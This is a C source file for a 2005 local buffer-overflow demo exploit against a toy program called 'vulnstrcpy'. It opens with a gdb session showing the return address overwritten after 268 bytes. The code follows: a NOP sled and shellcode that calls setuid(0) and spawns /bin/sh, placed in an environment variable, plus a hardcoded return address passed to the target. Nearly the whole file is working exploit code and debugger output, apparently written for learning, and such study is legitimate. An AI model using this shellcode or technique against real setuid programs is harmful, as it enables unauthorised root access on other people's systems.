/** 
    Local ./vulnstrcpy demo exploit   			
    by Hugo Martin (2005)	[www.hackcraft.com]

    Tested on: (Should work on any Distro) 
     -Slackware v10.1 
     -Fedora C3
     -Debian Sarge
**/

/**
sh-3.00$ gdb ./vulnstrcpy
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/lib
thread_db.so.1".

(gdb) run `perl -e "print 'A'x268"``perl -e "print 'x'x4"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hugomartin/learning/bof/vulnstrcpy `perl -e "print 'A'x268"``perl -e "print 'x'x4"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxx 

Program received signal SIGSEGV, Segmentation fault.
0x78787878 in ?? ()
(gdb) info reg
eax            0x112    274
ecx            0x40145840       1075075136
edx            0x112    274
ebx            0x40144ff4       1075073012
esp            0xbffff5f0       0xbffff5f0
ebp            0x41414141       0x41414141
esi            0xbffff650       -1073744304
edi            0x2      2
eip            0x78787878       0x78787878
eflags         0x10282  66178
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb) run `perl -e "print 'A'x268"``perl -e "print 'x'x4"`
**/

#include <stdio.h>
#include <sys/signal.h>

void aborted(int);

char shellcode[]=       /* HACKCRAFT shellcode */
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x54\x20\x20\x0a"
"\x68\x43\x52\x41\x46\x68\x48\x41\x43\x4b\x89\xe1"
"\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\x31\xc0\x31\xdb"
"\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24"
"\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0"
"\xb0\x01\xcd\x80\x5d\xc3\x8d\x76\x00";

main()
{
	unsigned long ret = 0xbffffd30;
	char buf[272];
	char egg[1024]; 
	char *ptr;

	int i=0;

	memset(buf,0x90,sizeof(buf));
	ptr = egg;

	for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = '\x90';
	for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

	egg[1024 - 1] = '\0';
	memcpy(egg,"EGG=",4);
	putenv(egg);	

	buf[268] = (ret & 0x000000ff);
        buf[269] = (ret & 0x0000ff00) >> 8;
        buf[270] = (ret & 0x00ff0000) >> 16;
        buf[271] = (ret & 0xff000000) >> 24;
	buf[272] = 0x00;
	
printf("=================================================================\n");
printf(" ./vulnstrcpy     			Demo Local Exploit	 \n\n");
printf(" by Hugo Martin                   	[ www.hackcraft.com ] 	 \n");
printf("=================================================================\n");
	printf("ret: 0x%x\n",ret);
	printf("buf: %d\n\n",strlen(buf));

	execl("vulnstrcpy", "vulnstrcpy", buf, NULL);
}